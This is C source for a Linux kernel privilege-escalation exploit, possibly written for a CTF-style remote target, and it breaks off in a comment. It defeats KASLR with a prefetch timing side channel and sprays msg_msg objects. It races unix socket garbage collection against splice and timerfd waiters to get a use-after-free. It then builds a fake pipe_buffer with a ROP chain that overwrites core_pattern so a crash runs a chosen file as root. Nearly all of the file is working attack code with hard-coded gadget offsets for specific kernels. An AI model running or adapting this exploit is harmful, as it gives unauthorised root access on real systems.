#define _GNU_SOURCE
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/timerfd.h>
#include <time.h>
#include <unistd.h>
#include <linux/io_uring.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/mman.h>
#include <err.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/prctl.h>
#include <pthread.h>
#include <poll.h>
#include <sys/epoll.h>
#include <sys/resource.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/sendfile.h>

// Evaluate x once and yield its value. If the value equals -1 (converted to
// the type of x), report the stringified expression through err(3) and exit
// with status 1. Uses the GNU statement-expression and typeof extensions.
// Note: the text of x becomes part of the runtime error message.
#define SYSCHK(x) ({              \
	typeof(x) __res = (x);        \
	if (__res == (typeof(x))-1)   \
		err(1, "SYSCHK(" #x ")"); \
	__res;                        \
})
// Scratch buffer that PAUSE reads one byte of stdin into.
char y[2];
// Debug helper: print ":" and block until one byte can be read from fd 0.
// NOTE(review): expands to a bare brace block (not do { } while (0)), so
// `if (c) PAUSE; else ...` would not parse as intended.
#define PAUSE          \
	{                  \
		printf(":");   \
		read(0, y, 1); \
	}
// Declared here but neither defined nor called in the code visible in this file.
size_t gettime();
// General-purpose scratch buffer for one-byte sync reads/writes and pipe draining.
char buf[0x1000];
// Duplicated timerfd descriptors and epoll instances created in do_epoll_enqueue().
int timefds[0x1000];
int epfds[0x1000];
// Timer expiry in nanoseconds used by trigger_unix_stream_sendpage(); main()
// increments it every round and periodically resets it to 200.
size_t timeout = 200;
// Temporary holder for socketpair() results before they are copied into A..D.
int fds[2];
// The two AF_UNIX stream socket pairs used per round: A<->B and C<->D.
int A, B, C, D;
// Payload bytes for the unix-socket messages and for datapipe.
char data[0x1000];
// Pipe used by the sendpage thread to wake the gc thread.
int sync_job[2];
// Pipe whose read end blocks spray_pipe_page_thread() until its write end is released.
int signalpipe[2];
// Pipe whose read end is spliced into socket A.
int datapipe[2];
// Pipes filled with spray_data by spray_pipe_page_thread().
int spray_pipe[0x100][2];
// Pipes created in corrupted_msg(); only the first 0xf0 entries are used there.
int spray_pipe2[0x400][2];

// timerfd created in main() and armed in trigger_unix_stream_sendpage().
int tfd;
// Page-sized template written into every spray_pipe; filled in by main().
char spray_data[0x1000];
// Message-queue id arrays allocated in setup_msg(): the bulk spray queues
// (msqid) and the queues reserved for the later stages (hackq).
int *msqid;
int *hackq;

// Shared System V message buffer used for every msgsnd()/msgrcv() in this file.
// NOTE: main() declares a local `struct msghdr msg` that shadows this object.
struct
{
	long mtype;
	char mtext[0x2000];
} msg;

// Address window and stride scanned by prefetch(0).
#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull

#define STEP_KERNEL 0x100000ull
#define SCAN_START_KERNEL KERNEL_LOWER_BOUND
#define SCAN_END_KERNEL KERNEL_UPPER_BOUND
// Number of probe slots in the window. The whole expansion is parenthesized so
// the macro can be used safely inside a larger expression.
#define ARR_SIZE_KERNEL ((SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL)

// Address window and stride scanned by prefetch(1).
#define PHYS_LOWER_BOUND 0xffff888000000000ull
#define PHYS_UPPER_BOUND 0xfffffe0000000000ull

#define STEP_PHYS 0x40000000ull
#define SCAN_START_PHYS PHYS_LOWER_BOUND
#define SCAN_END_PHYS PHYS_UPPER_BOUND
#define ARR_SIZE_PHYS ((SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS)

// prefetch() runs DUMMY_ITERATIONS unrecorded passes followed by ITERATIONS
// recorded passes over the window.
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100

// Not referenced by the code visible in this file (prefetch() has a parameter
// named `phys` that shadows the second one).
uint64_t kaslr;
uint64_t phys;

// https://www.willsroot.io/2022/12/entrybleed.html
// Timing probe: read the timestamp counter with rdtscp, issue prefetchnta and
// prefetcht2 on addr, read the counter again, and return the elapsed count.
// mfence/lfence instructions bracket the measurement.
// The template switches to Intel syntax and back to AT&T at the end.
// NOTE(review): rbx appears in the clobber list although the template never
// names it; rcx is listed because rdtscp also writes ecx.
uint64_t sidechannel(uint64_t addr)
{
	// a/b receive the low/high halves of the first counter read, c/d the second.
	uint64_t a, b, c, d;
	asm volatile(".intel_syntax noprefix;"
				 "mfence;"
				 "rdtscp;"
				 "mov %0, rax;"
				 "mov %1, rdx;"
				 "xor rax, rax;"
				 "lfence;"
				 "prefetchnta qword ptr [%4];"
				 "prefetcht2 qword ptr [%4];"
				 "xor rax, rax;"
				 "lfence;"
				 "rdtscp;"
				 "mov %2, rax;"
				 "mov %3, rdx;"
				 "mfence;"
				 ".att_syntax;"
				 : "=r"(a), "=r"(b), "=r"(c), "=r"(d)
				 : "r"(addr)
				 : "rax", "rbx", "rcx", "rdx");
	// Recombine each 64-bit timestamp from its two halves.
	a = (b << 32) | a;
	c = (d << 32) | c;
	return c - a;
}

// Scan an address window with sidechannel() and return the candidate address
// whose average probe time is the smallest.
//
// phys == 0 : scan [SCAN_START_KERNEL, SCAN_END_KERNEL) in STEP_KERNEL strides.
// phys != 0 : scan [SCAN_START_PHYS, SCAN_END_PHYS) in STEP_PHYS strides.
//
// The window is swept ITERATIONS + DUMMY_ITERATIONS times; the first
// DUMMY_ITERATIONS sweeps are not recorded. Returns ~0 if the window is empty.
// Exits through err(3) if the sample array cannot be allocated.
uint64_t prefetch(int phys)
{
	uint64_t arr_size = ARR_SIZE_KERNEL;
	uint64_t scan_start = SCAN_START_KERNEL;
	uint64_t step_size = STEP_KERNEL;
	if (phys)
	{
		arr_size = ARR_SIZE_PHYS;
		scan_start = SCAN_START_PHYS;
		step_size = STEP_PHYS;
	}

	// calloc zero-fills and checks the count*size product; the original
	// malloc result was handed to memset without a NULL check.
	uint64_t *samples = calloc(arr_size, sizeof(*samples));
	if (samples == NULL)
		err(1, "calloc");

	uint64_t min = ~0ull, addr = ~0ull;

	for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
	{
		for (uint64_t idx = 0; idx < arr_size; idx++)
		{
			uint64_t test = scan_start + idx * step_size;
			// Enter the kernel once before every probe (syscall number 104).
			syscall(104);
			uint64_t elapsed = sidechannel(test);
			if (i >= DUMMY_ITERATIONS)
				samples[idx] += elapsed;
		}
	}

	// Unsigned 64-bit index: the original compared an int against arr_size.
	for (uint64_t idx = 0; idx < arr_size; idx++)
	{
		samples[idx] /= ITERATIONS;
		if (samples[idx] < min)
		{
			min = samples[idx];
			addr = scan_start + idx * step_size;
		}
	}

	free(samples);

	return addr;
}

// Defaults used unless leak() or corrupted_msg() overwrite them at runtime.
// KERNEL_BASE is the base every gadget macro is computed from.
size_t KERNEL_BASE = 0xffffffff81000000;
// Address inside the direct map; PAGE_OFFSET_BASE is derived from it.
size_t LEAKED_KHEAP = 0xffff888140000000;

// Return the value that occurs most often in arr[0..n).
// On a tie, the candidate that appears first in the array wins.
// Returns 0 when n == 0 (the original returned an uninitialized variable).
// Quadratic scan; callers in this file pass n == 8.
size_t mostFrequent(size_t *arr, size_t n)
{
	size_t best_count = 0;
	size_t best_value = 0;

	for (size_t i = 0; i < n; i++)
	{
		size_t count = 0;
		for (size_t j = 0; j < n; j++)
		{
			if (arr[i] == arr[j])
				count++;
		}

		// Strict comparison keeps the earliest candidate on ties.
		if (count > best_count)
		{
			best_count = count;
			best_value = arr[i];
		}
	}

	return best_value;
}
// The remote server runs without KPTI (its CPU is not affected by Meltdown, so
// the kernel leaves KPTI off), which makes this a plain prefetch timing attack.
// ref: https://gruss.cc/files/prefetch.pdf
//
// Take eight prefetch() measurements of each window, print every pair, and
// store the most frequent result of each in KERNEL_BASE and LEAKED_KHEAP.
void leak()
{
	enum { SAMPLES = 0x8 };
	size_t text_guess[SAMPLES] = {0};
	size_t map_guess[SAMPLES] = {0};
	int round = 0;

	while (round < SAMPLES)
	{
		// 0x1600000 is subtracted from the raw kernel-window result.
		text_guess[round] = prefetch(0) - 0x1600000;
		map_guess[round] = prefetch(1);
		printf("0x%lx 0x%lx\n", text_guess[round], map_guess[round]);
		round++;
	}

	KERNEL_BASE = mostFrequent(text_guess, SAMPLES);
	LEAKED_KHEAP = mostFrequent(map_guess, SAMPLES);
	printf("choose 0x%lx 0x%lx\n", KERNEL_BASE, LEAKED_KHEAP);
}

#define FIXED_OFFSET 0x140000000 // subtracted from LEAKED_KHEAP to obtain PAGE_OFFSET_BASE
#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) // physmap base, i.e. the mapping of physical address 0x0
#define TARGET_PHYS_ADDR 0x82e2380 // physical address that, per the author, very likely holds a msg_msg after the 794 MB spray
#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR) // virtual address written into spray_data by main()

#define NUM_QUEUE_MAX 32000
#define NUM_QUEUE_RESV 100 // queues reserved for the later stages (hackq)
#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV) // queues used for the bulk spray (msqid)
#define NUM_MSG 204 // messages sent to every spray queue
#define CHUNK_SIZE 0x80
#define MSG_SIZE (CHUNK_SIZE - 0x30) // payload bytes per spray message (CHUNK_SIZE minus 0x30)

// Spray as many msg_msg objects as possible to fill kernel heap memory.
// On a 4 GB RAM system this sprays NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB,
// which the author found sufficient for the chosen address to hold a msg_msg.
//
// Allocates the msqid and hackq id arrays, creates NUM_QUEUE spray queues plus
// NUM_QUEUE_RESV reserved queues, then sends NUM_MSG messages of MSG_SIZE bytes
// to every spray queue. Each message stores its queue index in mtext[0] and
// uses (message index + 1) as its mtype.
//
// Returns 0 (the original fell off the end of an int function). Any failing
// allocation or SYSCHK-wrapped call terminates the process through err(3).
int setup_msg()
{
	msqid = malloc(sizeof(*msqid) * 40000);
	hackq = malloc(sizeof(*hackq) * NUM_QUEUE_RESV);
	// Both arrays are indexed immediately below; fail loudly instead of
	// dereferencing NULL.
	if (msqid == NULL || hackq == NULL)
		err(1, "malloc");
	printf("setup msg start..\n");
	memset(&msg.mtext[0], 0, 0x2000);
	msg.mtype = 1;
	// Remove the current user's existing message queues to avoid hitting limits.
	system("ipcrm --all=msg");
	for (int i = 0; i < NUM_QUEUE; i++)
	{
		msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
		SYSCHK(msqid[i]);
	}
	for (int i = 0; i < NUM_QUEUE_RESV; i++)
	{
		hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
		SYSCHK(hackq[i]);
	}
	// Fake `struct skb_shared_info` in the data of msg_msg
	// A specific kernel heap address is later chosen as `skb_shinfo(skb)`
	msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags
	for (int j = 0; j < NUM_MSG; j++)
	{
		for (int i = 0; i < NUM_QUEUE; i++)
		{
			*(size_t *)&msg.mtext[0] = i; // queue identifier stored here
			msg.mtype = j + 1; // msg index identifier
			SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT));
		}
	}
	printf("setup msg done\n");
	return 0;
}

// Build-specific code and data addresses, selected at compile time with -DLTS.
// Every address macro is KERNEL_BASE plus an offset. In the LTS table the
// offsets are written as absolute addresses minus STATIC_KBASE; in the other
// table STATIC_KBASE is 0 and the literals are already offsets.
// START_ROP is the byte offset at which the ROP() macro starts writing.
// NOTE(review): in the non-LTS table POP_RSI2 has the same value as POP_RSI,
// and PIVOT3 is 0; PIVOT3 is only consumed by the LTS layout in this file.
#ifdef LTS
#define START_ROP 0x50
#define STATIC_KBASE 0xffffffff81000000
#define POP_RDI (KERNEL_BASE + (0xffffffff8112cfc0 - STATIC_KBASE))	 // pop rdi ; ret
#define POP_RSI (KERNEL_BASE + (0xffffffff81064c7e - STATIC_KBASE))	 // pop rsi ; ret
#define POP_RSI2 (KERNEL_BASE + (0xffffffff811ea35e - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret
#define POP_RDX (KERNEL_BASE + (0xffffffff810bf3d2 - STATIC_KBASE))	 // pop rdx ; ret
#define POP_RSP (KERNEL_BASE + (0xffffffff81027924 - STATIC_KBASE))	 // pop rsp ; ret
#define PIVOT (KERNEL_BASE + (0xffffffff8198954b - STATIC_KBASE))	 // push rsi ; jmp qword ptr [rsi + 0x39]
#define PIVOT2 (KERNEL_BASE + (0xffffffff8112cfbe - STATIC_KBASE))	 // pop rsp ; pop r15 ; ret
#define PIVOT3 (KERNEL_BASE + (0xffffffff81c53eb4 - STATIC_KBASE))	 // push rsi ; jmp qword ptr [rsi + 0x2e]
#define CORE_PATTERN (KERNEL_BASE + (0xffffffff837ba460 - STATIC_KBASE))
#define COPY_FROM_USER (KERNEL_BASE + (0xffffffff8186e280 - STATIC_KBASE))
#define MSLEEP (KERNEL_BASE + (0xffffffff812292e0 - STATIC_KBASE))
#define ANON_PIPE_BUF_OPS_OFF (0xffffffff82a1cf80 - STATIC_KBASE)
#else
#define START_ROP 0x50
#define STATIC_KBASE 0
#define POP_RDI (KERNEL_BASE + (0x012001cc - STATIC_KBASE)) // pop rdi ; ret
#define POP_RSI (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; ret
#define POP_RSI2 (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret
#define POP_RDX (KERNEL_BASE + (0x00fc7352 - STATIC_KBASE)) // pop rdx ; ret
#define POP_RSP (KERNEL_BASE + (0x00fd3ea6 - STATIC_KBASE)) // pop rsp ; ret
#define PIVOT   (KERNEL_BASE + (0x008a9428 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39]
#define PIVOT2  (KERNEL_BASE + (0x0008160e - STATIC_KBASE)) // pop rsp ; pop r15 ; ret
#define PIVOT3   (KERNEL_BASE + (0 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e]
#define CORE_PATTERN (KERNEL_BASE + (0x239e4a0 - STATIC_KBASE))
#define COPY_FROM_USER (KERNEL_BASE + (0x7855f0 - STATIC_KBASE))
#define MSLEEP (KERNEL_BASE + (0x16c1c0 - STATIC_KBASE))
#define ANON_PIPE_BUF_OPS_OFF (0x17cae40 - STATIC_KBASE)
#endif

// String copied over CORE_PATTERN by the chain below; check_core() looks for
// the same text in /proc/sys/kernel/core_pattern.
char user_buf[] = "|/proc/%P/fd/666";
// Access the idx-th 8-byte slot of the chain, which starts START_ROP bytes
// into the buffer named `rop` in the enclosing scope.
#define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)]
// Fill the buffer at `rop` with a fake pipe_buffer header followed by a chain
// of addresses, assuming the buffer will be located at kernel address rop_addr.
//
// rop_addr: address the buffer is expected to have; used for self-references.
// rop:      writable buffer; bytes 0x8 .. START_ROP + 10*8 are written.
//
// NOTE(review): declared int but has no return statement; the only caller in
// this file ignores the result.
// NOTE(review): the stores at offsets 0x39 / 0x2e are not 8-byte aligned.
int build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop)
{
	*(size_t *)&rop[0x8] = POP_RDI;
	*(size_t *)&rop[0x18] = POP_RSP;
	*(size_t *)&rop[0x20] = rop_addr + START_ROP;

#ifdef LTS
	*(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops
	*(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release
	*(size_t*)&rop[0x2e] = PIVOT2;
#else
	*(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops
	*(size_t *)&rop[0x28] = PIVOT; //set pipe_buf_operations.release
	*(size_t *)&rop[0x39] = PIVOT2;
#endif

	int i = 0;
	// copy_from_user(core_pattern, user_buf, sizeof(user_buf));
	ROP(i++) = POP_RDI;
	ROP(i++) = CORE_PATTERN;
	ROP(i++) = POP_RSI2;
	ROP(i++) = (size_t)&user_buf;
	ROP(i++) = POP_RDX;
	ROP(i++) = sizeof(user_buf);
	ROP(i++) = COPY_FROM_USER;
	// msleep(0x10000);
	ROP(i++) = POP_RDI;
	ROP(i++) = 0x10000;
	ROP(i++) = MSLEEP;
}

// Check whether any sprayed message queue shows signs of corruption and, if
// so, run the remaining stages.
//
// Detection: every queue in msqid is walked with MSG_COPY peeks (with MSG_COPY
// the msgtyp argument of msgrcv() is a position in the queue, and the message
// is not removed). A message is considered corrupted when its mtype does not
// follow the previous one or when the queue index stored in mtext[0] is not
// the queue being walked.
//
// Returns 1 after running all stages, 0 when nothing was detected.
// NOTE(review): corrupted_type is taken from tmp_mtype, so a mismatch on the
// first message of a queue (tmp_mtype == 0) jumps to `done` but is then treated
// as "not found" by the `if (corrupted_type)` test.
// Any SYSCHK-wrapped call that returns -1 terminates the process.
int corrupted_msg()
{
	int corrupted_q = 0;
	int corrupted_type = 0;
	// victim_q is only read inside the `if (corrupted_type)` branch; on the
	// path where corrupted_type ends up non-zero it has been assigned in the scan loop.
	int victim_q, victim_type = 0;
	for (int i = 0; i < NUM_QUEUE; i++)
	{
		int tmp_mtype = 0;
		for (int j = 0; j < NUM_MSG; j++)
		{
			if (msgrcv(msqid[i], &msg, MSG_SIZE, j, MSG_COPY | IPC_NOWAIT) < 0)
			{
				break;
			}
			// check if msg is corrupted
			if (msg.mtype - 1 != tmp_mtype || *(size_t *)&msg.mtext[0] != i)
			{
				corrupted_q = i; // corrupted msg queue
				corrupted_type = tmp_mtype; // corrupted msg index/type identifier
				victim_q = *(size_t *)&msg.mtext[0]; // victim msg queue
				victim_type = msg.mtype; // victim msg index/type identifier
				// Now `msqid[corrupted_q]` at position corrupted_type points to the same msg
				// as msqid[victim_q] with mtype `victim_type`
				goto done;
			}
			tmp_mtype = msg.mtype;
		}
	}
done:
	if (corrupted_type)
	{
		printf("corrupted_q: %d\n", corrupted_q);
		printf("corrupted_type: %d\n", corrupted_type);
		printf("victim_q: %d\n", victim_q);
		printf("victim_type: %d\n", victim_type);
		// delete msg at victim_q with mtype victim_type
		msgrcv(msqid[victim_q], &msg, MSG_SIZE, victim_type, IPC_NOWAIT); // this deleted msg can still be accessed through corrupted_q at corrupted_type (msg UAF)

		// prepare corrupted msg_msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future)
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x200; // fake msg.m_ts (for leak kernel address via buffer overread)
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next
		((size_t *)&msg.mtext[0x1000 - 0x30])[4] = 0; // msg.security

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			// slot [5] carries the index of the reserved queue the message was sent to
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 1;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg
			msg.mtype = 2;
			SYSCHK(msgsnd(hackq[j], &msg, 0x200, 0)); // send rop payload here later [1]
		}
		// msgrcv on corrupted msg to learn which msg is adjacent to it
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT));
		int victim2_q = *(size_t *)&msg.mtext[0x80];
		int victim2_type = *(size_t *)&msg.mtext[0x60];
		printf("victim2_q: %d\n", victim2_q); // adjacent corrupted msg queue identifier
		printf("victim2_type: %d\n", victim2_type); // adjacent corrupted msg m_type identifier
		msgrcv(msqid[victim2_q], &msg, MSG_SIZE, victim2_type, IPC_NOWAIT); // free the adjacent msg
		
		// reallocate adjacent msg with another msg that contains a kmalloc-1024 heap address
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			msg.mtype = 3;
			*(size_t *)&msg.mtext[0] = j;
			SYSCHK(msgsnd(hackq[j], &msg, MSG_SIZE, 0)); // replace the adjacent msg
			msg.mtype = 4;
			SYSCHK(msgsnd(hackq[j], &msg, 0x400 - 0x30, 0)); // fill adjacent msg.next with kmalloc-1024
		}

		// msgrcv on corrupted msg for leaking known heap address
		// msg.prev is prepared rop memory allocated at [1]
		// msg.next is another heap memory that will be replaced with pipe_buffer later
		// NOTE(review): the two trailing comments below label 0x50 as m_prev and
		// 0x58 as m_next while the variable names pair them the other way round —
		// confirm which labelling is intended.
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT));
		size_t known_addr_pipe = *(size_t *)&msg.mtext[0x50]; // adjacent msg msg.m_prev
		size_t known_addr_rop = *(size_t *)&msg.mtext[0x58]; // adjacent msg msg.m_next
		int victim3_q = *(size_t *)&msg.mtext[0x80]; // get msg queue identifier from adjacent msg
		int victim4_q = *(size_t *)&msg.mtext[0x0]; // get msg queue identifier from msg
		printf("known_addr_rop 0x%lx\n", known_addr_rop); // rop payload address
		printf("known_addr_pipe 0x%lx\n", known_addr_pipe); // pipe_buffer address 
		printf("victim3_q: %d\n", victim3_q); 
		printf("victim4_q: %d\n", victim4_q);
		// delete msg that will be replaced with pipe_buffer
		SYSCHK(msgrcv(hackq[victim3_q], &msg, 0x400 - 0x30, 4, IPC_NOWAIT));
		// replace the deleted msg with pipe_buffer
		for (int i = 0; i < 0xf0; i++)
		{
			//printf("%p\n",i);
			SYSCHK(pipe(spray_pipe2[i]));
			SYSCHK(write(spray_pipe2[i][1], "pwn", 3));
		}

		// delete the msg (that was used to build the fake msg)
		SYSCHK(msgrcv(hackq[victim4_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 1, IPC_NOWAIT));

		// prepare for the second fake msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future)
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x1000 - 0x30 + 0x400 - 0x8; // fake msg.m_ts
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = known_addr_pipe - 0x10; // fake msg.next for leak anon_pipe_buf_ops

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 5;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg
		}

		// receive corrupted msg
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x1000 - 0x30 + 0x400 - 0x8, corrupted_type, MSG_COPY | IPC_NOWAIT));
		int victim5_q = *(size_t *)&msg.mtext[0x0]; // msg queue identifier
		printf("victim5_q: %d\n", victim5_q);
		size_t anon_pipe_buf = *(size_t *)&msg.mtext[0x1000 - 0x30 + 0x20 - 8]; // anon_pipe_buf_ops address
		printf("anon_pipe_buf 0x%lx\n", anon_pipe_buf);
		KERNEL_BASE = anon_pipe_buf - ANON_PIPE_BUF_OPS_OFF; // leak kernel base
		printf("fixing kernel base to 0x%lx\n", KERNEL_BASE);

		// delete the corrupted msg that contains the fake msg data so another fake msg can be built
		SYSCHK(msgrcv(hackq[victim5_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT));

		// rebuild fake msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = MSG_SIZE; // fake msg.m_ts
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next
		((size_t *)&msg.mtext[0x1000 - 0x30])[4] = known_addr_pipe; // fake msg.security (for arbitrary free on pipe_buffer)

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 1;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // overwrite stale msg with fake msg
		}

		// free up the msg quota
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			if (j != victim5_q) // make sure we don't touch the corrupted queue
				SYSCHK(msgrcv(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT));
		}

		// delete the fake msg, this will perform arbitrary free on pipe_buffer
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, MSG_SIZE, 0x1337, IPC_NOWAIT));

		// prepare fake pipe_buffer and rop payload
		msg.mtype = 6;
		build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			// overwrite pipe_buffer
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x400 - 8, IPC_NOWAIT));
		}

		// trigger RIP control
		for (int i = 0; i < 0xf0; i++)
		{
			close(spray_pipe2[i][0]);
			close(spray_pipe2[i][1]);
		}

		return 1;
	}
	return 0;
}

// Forward declaration; defined further down in this file.
void set_cpu(int i);

// Thread body (argument unused, always returns NULL). Pinned to CPU 0.
// Wakes trigger_unix_gc_thread() through sync_job, arms the global timerfd
// `tfd` to expire after `timeout` nanoseconds, then splices up to 0x1000 bytes
// from datapipe[0] into socket A and closes datapipe[0].
// The results of write() and splice() are not checked.
void *trigger_unix_stream_sendpage(void *x)
{
	set_cpu(0);
	// one-shot expiry after `timeout` nanoseconds (no interval is set)
	struct itimerspec new = {.it_value.tv_nsec = timeout};
	// Send signal to trigger_unix_gc_thread
	write(sync_job[1], "H", 1);
	SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL));
	splice(datapipe[0], 0, A, 0, 0x1000, 0);
	close(datapipe[0]);
	return NULL;
}

// Thread body (always returns NULL). Pinned to CPU 1.
// Creates a throwaway AF_UNIX stream socket, blocks until the sendpage thread
// writes a byte to sync_job, then closes the socket.
// The single sync byte is read into the storage of the parameter `x`, which is
// otherwise unused. The socket() result is not checked.
void *trigger_unix_gc_thread(void *x)
{
	set_cpu(1);
	int s = socket(AF_UNIX, SOCK_STREAM, 0);
	read(sync_job[0], &x, 1);
	// Releasing a unix socket triggers unix_gc
	close(s);
	return NULL;
}

// Thread body (argument unused, always returns NULL). Pinned to CPU 1.
// Blocks in read() on signalpipe[0]; once that read returns, writes the
// 0x1000-byte spray_data template 0x10 times into each of the 0x100 spray
// pipes. Return values of read() and write() are not checked.
void *spray_pipe_page_thread(void *x)
{
	set_cpu(1);
	// After unix_gc cleans the skb, this thread wakes up and starts spraying pipe pages.
	read(signalpipe[0], buf, 1);
	for (int i = 0; i < 0x100; i++)
		for (int j = 0; j < 0x10; j++)
			write(spray_pipe[i][1], spray_data, 0x1000);

	return NULL;
}

// Register fd on the epoll instance epfd with the given event mask, storing fd
// itself as the user data. Terminates the process through SYSCHK if
// epoll_ctl() returns -1.
static void epoll_ctl_add(int epfd, int fd, uint32_t events)
{
	struct epoll_event ev;

	ev.data.fd = fd;
	ev.events = events;

	SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev));
}

// Restrict the caller (pid argument 0) to CPU number i.
// The result of sched_setaffinity() is ignored, so a failure is silent.
void set_cpu(int i)
{
	cpu_set_t only_this_cpu;

	CPU_ZERO(&only_this_cpu);
	CPU_SET(i, &only_this_cpu);

	sched_setaffinity(0, sizeof(only_this_cpu), &only_this_cpu);
}

// Fork four helper processes that each attach a large number of epoll
// registrations to the file behind `fd` (main() passes the timerfd).
//
// Each child duplicates fd 0x100 times, creates 0xc0 epoll instances, and adds
// every duplicate to every instance with an empty event mask. It then writes
// one byte to the socketpair to tell the parent it is done and stops itself
// with SIGSTOP so the registrations stay alive.
// The parent waits for each child's byte before forking the next one.
//
// NOTE(review): the socketpair() and fork() results are not checked; if fork()
// fails, the parent blocks forever in read(). A child that is ever resumed
// after SIGSTOP falls through into the parent's part of the loop.
void do_epoll_enqueue(int fd)
{
	int cfd[2];
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	for (int k = 0; k < 0x4; k++)
	{
		if (fork() == 0)
		{
			for (int i = 0; i < 0x100; i++)
			{
				timefds[i] = SYSCHK(dup(fd));
			}
			for (int i = 0; i < 0xc0; i++)
			{
				epfds[i] = SYSCHK(epoll_create(0x1));
			}
			for (int i = 0; i < 0xc0; i++)
			{
				for (int j = 0; j < 0x100; j++)
				{
					// queue as many async waiters as possible on the timerfd waitqueue
					epoll_ctl_add(epfds[i], timefds[j], 0);
				}
			}
			write(cfd[1], buf, 1);
			raise(SIGSTOP); // stop here just to keep the epoll registrations alive
		}
		// wait until the child has queued everything
		read(cfd[0], buf, 1);
	}
	close(cfd[0]);
	close(cfd[1]);
}

// Report whether /proc/sys/kernel/core_pattern currently starts with the
// 16-character string "|/proc/%P/fd/666".
// Returns 1 on a match, 0 otherwise (including when the file cannot be
// opened or read, since the zero-filled buffer then never matches).
int check_core()
{
	static const char expected[] = "|/proc/%P/fd/666";
	char contents[0x100] = {0};

	int pattern_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
	read(pattern_fd, contents, sizeof(contents));
	close(pattern_fd);

	if (strncmp(contents, expected, 0x10) != 0)
		return 0;
	return 1;
}

// Copy the file named "root" (relative to the current directory) into an
// anonymous memfd, install that memfd as descriptor 666, poll check_core()
// once per second until it reports a match, and then deliberately fault by
// writing to address 0.
// Presumably descriptor 666 is what the "|/proc/%P/fd/666" pattern resolves to
// for this process — confirm against core(5).
// `cmd` is unused. The memfd_create() and open() results are not checked
